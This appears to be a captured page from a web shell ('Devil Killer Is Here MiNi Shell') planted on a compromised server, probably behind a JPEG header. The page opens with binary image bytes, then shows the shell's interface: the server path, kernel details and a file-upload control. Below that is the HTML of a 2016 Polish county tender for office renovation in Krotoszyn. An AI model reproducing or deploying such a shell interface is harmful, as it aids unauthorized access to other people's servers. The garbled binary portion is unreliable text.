JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/71823-N-2016.html

<p class="kh_header"><b>Krotoszyn: Zadanie 1
Remont pomieszczeń biurowych  w  budynku Nr 2 Starostwa Powiatowego w Krotoszynie.
Zadanie 2
Remont pomieszczeń biurowych  w  budynku Nr 1 Starostwa Powiatowego w Krotoszynie - Wydział Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami</b><br>
<b>Numer ogłoszenia: 71823 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
Remont pomieszczeń biurowych  w  budynku Nr 2 Starostwa Powiatowego w Krotoszynie.
Zadanie 2
Remont pomieszczeń biurowych  w  budynku Nr 1 Starostwa Powiatowego w Krotoszynie - Wydział Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
	  Zadanie 1
	  Remont pomieszczeń biurowych  w  budynku Nr 2 Starostwa Powiatowego w     Krotoszynie.
	Zadanie 2
  Remont pomieszczeń biurowych  w  budynku Nr 1 Starostwa Powiatowego w    Krotoszynie - Wydział Geodezji, Kartografii, Katastru i Gospodarki     Nieruchomościami.


1)	Budynki położone są w Krotoszynie przy ul. 56 Pułku Piechoty Wlkp. 8 10, znajdują na terenie historycznego układu urbanistycznego miasta Krotoszyna pod Nr 692 Wlkp.  A
2)	Budynki  użytkowane są  obecnie przez Starostwo Powiatowe w Krotoszynie. Stanowią część dawnego kompleksu koszarowego zlokalizowanego przy ul. 56 Pułku Piechoty Wielkopolskiej 8 i 10 w Krotoszynie. Kompleks koszar pochodzi z końca XIX wieku. W okresie międzywojennym koszary były siedzibą 56 Pułku Piechoty. W okresie powojennym stanowiły nadal siedzibę jednostek wojskowych. Budynki   są dwukondygnacyjne, kryte dachem stromym. 
3)	Zadanie 1 
Założono roboty przygotowawcze, zmycie powierzchni przygotowanych do malowania z poszpachlowaniem nierówności, gruntowanie powierzchni, malowanie  powierzchni wewnętrznych ścian i sufitów, malowanie rur, zerwanie wykładziny dywanowej, cyklinowanie  posadzek, lakierowanie posadzek,  wymiana cokołów. Szczegółowy zakres prac zawierają dołączone do niniejszej specyfikacji kosztorysy ofertowe
Zadanie 2
 Założono roboty przygotowawcze, zmycie powierzchni przygotowanych do     malowania z poszpachlowaniem nierówności, gruntowanie powierzchni, malowanie   powierzchni wewnętrznych ścian i  sufitów, malowanie rur. Szczegółowy zakres prac zawierają dołączone do niniejszej specyfikacji kosztorysy ofertowe

4)	Szczegółowy opis przedmiotu zamówienia określają  kosztorysy ofertowe stanowiące Załącznik Nr 1 a i 1 b  do  niniejszej SIWZ

5)	Wykonawca w ramach przedmiotu zamówienia zobowiązany jest  do:
wykonania  wszelkich robót przygotowawczych, porządkowych (zagospodarowania placu budowy, utrzymania zaplecza budowy, uprzątnięcia placu budowy i przywrócenia do stanu zastanego) 
oraz wszelkich innych czynności niezbędnych do prawidłowego wykonania przedmiotu zamówienia i użytkowania przez Zamawiającego.

6)	Wykonawca ponosi pełną odpowiedzialność za ewentualne szkody wyrządzone przez jego   działania lub zaniechania i zobowiązany jest do ich naprawy na własny koszt.

7)	Jeżeli w opisie przedmiotu zmówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie wskazaniu temu towarzyszą wyrazy lub równoważne, co oznacza, że dopuszcza się  rozwiązania nie gorsze niż opisane, spełniające wymagania techniczne, funkcjonalne, eksploatacyjne, jakościowe, co najmniej takie jak wskazane w opisie przedmiotu zamówienia Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, funkcjonalnych, eksploatacyjnych i jakościowych, nie gorszych niż przyjęte w dokumentacji.

8)	Wymagany minimalny okres gwarancji na wykonane roboty (materiały i robociznę) wynosi 12 miesięcy od daty bezusterkowego odbioru końcowego. 
Jednym z kryteriów oceny ofert jest  okres na jaki  Wykonawca wydłuży gwarancję.  Dokładny okres gwarancji określony zostanie po wyborze oferty przedstawiającej najkorzystniejszy bilans kryteriów oceny ofert tj. ceny oraz wydłużenie gwarancji

9)	Wykonanie zamówienia:
a)	 Do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów i urządzeń o najnowszych rozwiązaniach technologicznych gwarantujących odpowiednią jakość wykonania zamówienia.
b)	Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów dokumenty potwierdzające pozwolenie na zastosowanie (atesty, certyfikaty, aprobaty techniczne, świadectwa jakości)

10)	Wykonawca jest odpowiedzialny za prawidłowe metody i jakość wykonanych robót, bezpieczeństwo wszelkich czynności na terenie trwania prac.

11)	Przedmiot zamówienia należy wykonać zgodnie z załączoną dokumentacją, wytycznymi określonymi w SIWZ, z wiedzą, sztuką budowlaną, przepisami BHP, ppoż. oraz poleceniami przedstawiciela ze strony Zamawiającego.

12)	Zabrania się stosowania materiałów nieodpowiadających wymaganiom Polskiej Normy i PN EN oraz o innych parametrach niż określone w projekcie.

13)	Prace  obejmujące realizację przedmiotu zamówienia  winny być prowadzone w sposób jak najmniej uciążliwy dla otoczenia z uwzględnieniem godzin ciszy nocnej.

14)	Wszelkie roboty związane z prawidłowym wykonaniem przedmiotu zamówienia muszą być tak zorganizowane przez Wykonawcę, aby nie utrudniały działalności Starostwa Powiatowego w Krotoszynie.
W związku z  przeprowadzaniem robót na  obiekcie użytkowym, należy zachować szczególną  ostrożność i  zminimalizować uciążliwości związane z przeprowadzanymi pracami. Wykonawca winien zapewnić szczególne bezpieczeństwo  interesantom i  pracownikom Starostwa Powiatowego w Krotoszynie.  
15)	Prace winny odbywać się od poniedziałku do piątku w godzinach:  nie wcześniej niż od 07.00  do 19.00
16)	Zamawiający nie  dopuszcza częściowego odbiór prac oraz częściowego  fakturowania wykonanych prac (dla danego zadania). Podstawę do wystawienia faktury stanowi  pozytywny protokół końcowego odbioru prac (oddzielnie dla każdego zadania), potwierdzony przez upoważnionego przedstawiciela stron.

17)	Wykonawca na potrzeby ochrony powietrza przed zanieczyszczeniem jest zobowiązany do używania środków transportu spełniających odpowiednie normy emisji spalin oraz prowadzenia prac budowlanych w sposób ograniczający niezorganizowaną emisję pyłu do powietrza. Ponadto Wykonawca jest zobowiązany do użytkowania farb i lakierów  ekologicznych o małej zawartości NMLZO (niemetanowe lotne związki organiczne).
2.3.  Istnieje możliwość dokonania wizji lokalnej obiektu po uzgodnieniu telefonicznym -            Kazimierz Serek tel. 62 725-42-56 w. 335

    2.4. Podwykonawstwo
1.)	Zamawiający nie dokonuje zastrzeżenia dotyczącego obowiązku osobistego wykonania kluczowych części zamówienia przez Wykonawcę
2.)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczyła będzie podmiotu, na którego zasoby wykonawca powoływał się , na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu określonych w SIWZ, wykonawca zobowiązany będzie wykazać zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
3.)	Zamawiający we wzorze umowy określił  wymagania dotyczące  umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje  zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu
4.)	 Zamawiający  we wzorze umowy  określił informacje o umowach o podwykonawstwo, których  przedmiotem są dostawy lub usługi, które podlegają obowiązkowi przedkładania zamawiającemu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.43.21.30-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postepowaniu, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postepowaniu, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postepowaniu, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postepowaniu, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postepowaniu, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Wydłużenie gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy:
1)	Obniżenie wynagrodzenia - W przypadkach określonych  w § 5 ust. 1 i 2  umowy,  tj. w przypadku  zmniejszenia  zakresu robót,  wykonania robót zamiennych  
2)	Dopuszcza się zmianę osoby (kierownika budowy)  przeznaczonej do realizacji zamówienia  przez Wykonawcę. W takim przypadku, Wykonawca do realizacji przedmiotu zamówienia zapewnia  osoby posiadające    kwalifikacje, uprawnienia nie mniejsze niż określone w warunkach udziału   w postępowaniu,
3)	Dopuszcza się zmianę inspektora nadzoru.
4)	Zmianę podwykonawców i dalszych podwykonawców, na zasoby których Wykonawca powoływał się przy wykazywaniu  spełniania warunków udziału w postępowaniu.  Zamawiający dopuszcza możliwość zmiany podwykonawców i dalszych  podwykonawców, pod warunkiem wykazania zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
5)	Przedłużenia terminu  wykonania przedmiotu zamówienia  z przyczyn nie wynikających   ze zwłoki Wykonawcy w  szczególności:
a)	 razie zaistnienia  zdarzeń o charakterze działania siły wyższej, przez która strony rozumieją m.in. klęski żywiołowe, stan wyjątkowy, działania terrorystyczne,  strajk, inne zdarzenia mające charakter siły wyższej; o czas trwania siły wyższej
b)	 w razie udzielenia zamówienia dodatkowego, zgodnie z  art. 67  ust. 1 pkt. 5 ustawy Prawo zamówień publicznych, o okres wykonywania zamówienia dodatkowego.
c)	gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które  Wykonawca ponosi odpowiedzialność.
d)	wystąpienia znalezisk archeologicznych, które mogą skutkować w świetle dotychczasowych założeń nieterminowym wykonaniem prac.
e)	wystąpienia warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej,.
6)	Przedłużenia terminu  wykonania przedmiotu zamówienia  z powodu wystąpienia okoliczności, za które odpowiada Zamawiający, w szczególności,  które będą  następstwem nieterminowego przekazania placu budowy, konieczności dokonania zmian w dokumentacji projektowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat krotoszyn.bip.net.pl
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2016 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
Remont pomieszczeń biurowych  w  budynku Nr 2 Starostwa Powiatowego w Krotoszynie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
Remont pomieszczeń biurowych  w  budynku Nr 2 Starostwa Powiatowego w Krotoszynie.
1)	Budynki położone są w Krotoszynie przy ul. 56 Pułku Piechoty Wlkp. 8 10, znajdują na terenie historycznego układu urbanistycznego miasta Krotoszyna pod Nr 692/Wlkp./A
2)	Budynki  użytkowane są  obecnie przez Starostwo Powiatowe w Krotoszynie. Stanowią część dawnego kompleksu koszarowego zlokalizowanego przy ul. 56 Pułku Piechoty Wielkopolskiej 8 i 10 w Krotoszynie. Kompleks koszar pochodzi z końca XIX wieku. W okresie międzywojennym koszary były siedzibą 56 Pułku Piechoty. W okresie powojennym stanowiły nadal siedzibę jednostek wojskowych. Budynki   są dwukondygnacyjne, kryte dachem stromym. 
3)	Zadanie 1 
Założono roboty przygotowawcze, zmycie powierzchni przygotowanych do malowania z poszpachlowaniem nierówności, gruntowanie powierzchni, malowanie  powierzchni wewnętrznych ścian i sufitów, malowanie rur, zerwanie wykładziny dywanowej, cyklinowanie  posadzek, lakierowanie posadzek,  wymiana cokołów. Szczegółowy zakres prac zawierają dołączone do niniejszej specyfikacji kosztorysy ofertowe
Zadanie 2
 Założono roboty przygotowawcze, zmycie powierzchni przygotowanych do     malowania z poszpachlowaniem nierówności, gruntowanie powierzchni, malowanie   powierzchni wewnętrznych ścian i  sufitów, malowanie rur. Szczegółowy zakres prac zawierają dołączone do niniejszej specyfikacji kosztorysy ofertowe

4)	Szczegółowy opis przedmiotu zamówienia określają  kosztorysy ofertowe stanowiące Załącznik Nr 1 a i 1 b  do  niniejszej SIWZ

5)	Wykonawca w ramach przedmiotu zamówienia zobowiązany jest  do:
wykonania  wszelkich robót przygotowawczych, porządkowych (zagospodarowania placu budowy, utrzymania zaplecza budowy, uprzątnięcia placu budowy i przywrócenia do stanu zastanego) 
oraz wszelkich innych czynności niezbędnych do prawidłowego wykonania przedmiotu zamówienia i użytkowania przez Zamawiającego.

6)	Wykonawca ponosi pełną odpowiedzialność za ewentualne szkody wyrządzone przez jego   działania lub zaniechania i zobowiązany jest do ich naprawy na własny koszt.

7)	Jeżeli w opisie przedmiotu zmówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie wskazaniu temu towarzyszą wyrazy lub równoważne, co oznacza, że dopuszcza się  rozwiązania nie gorsze niż opisane, spełniające wymagania techniczne, funkcjonalne, eksploatacyjne, jakościowe, co najmniej takie jak wskazane w opisie przedmiotu zamówienia Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, funkcjonalnych, eksploatacyjnych i jakościowych, nie gorszych niż przyjęte w dokumentacji.

8)	Wymagany minimalny okres gwarancji na wykonane roboty (materiały i robociznę) wynosi 12 miesięcy od daty bezusterkowego odbioru końcowego. 
Jednym z kryteriów oceny ofert jest  okres na jaki  Wykonawca wydłuży gwarancję.  Dokładny okres gwarancji określony zostanie po wyborze oferty przedstawiającej najkorzystniejszy bilans kryteriów oceny ofert tj. ceny oraz wydłużenie gwarancji

9)	Wykonanie zamówienia:
a)	 Do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów i urządzeń o najnowszych rozwiązaniach technologicznych gwarantujących odpowiednią jakość wykonania zamówienia.
b)	Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów dokumenty potwierdzające pozwolenie na zastosowanie (atesty, certyfikaty, aprobaty techniczne, świadectwa jakości)

10)	Wykonawca jest odpowiedzialny za prawidłowe metody i jakość wykonanych robót, bezpieczeństwo wszelkich czynności na terenie trwania prac.

11)	Przedmiot zamówienia należy wykonać zgodnie z załączoną dokumentacją, wytycznymi określonymi w SIWZ, z wiedzą, sztuką budowlaną, przepisami BHP, ppoż. oraz poleceniami przedstawiciela ze strony Zamawiającego.

12)	Zabrania się stosowania materiałów nieodpowiadających wymaganiom Polskiej Normy i PN EN oraz o innych parametrach niż określone w projekcie.

13)	Prace  obejmujące realizację przedmiotu zamówienia  winny być prowadzone w sposób jak najmniej uciążliwy dla otoczenia z uwzględnieniem godzin ciszy nocnej.

14)	Wszelkie roboty związane z prawidłowym wykonaniem przedmiotu zamówienia muszą być tak zorganizowane przez Wykonawcę, aby nie utrudniały działalności Starostwa Powiatowego w Krotoszynie.
W związku z  przeprowadzaniem robót na  obiekcie użytkowym, należy zachować szczególną  ostrożność i  zminimalizować uciążliwości związane z przeprowadzanymi pracami. Wykonawca winien zapewnić szczególne bezpieczeństwo  interesantom i  pracownikom Starostwa Powiatowego w Krotoszynie.  
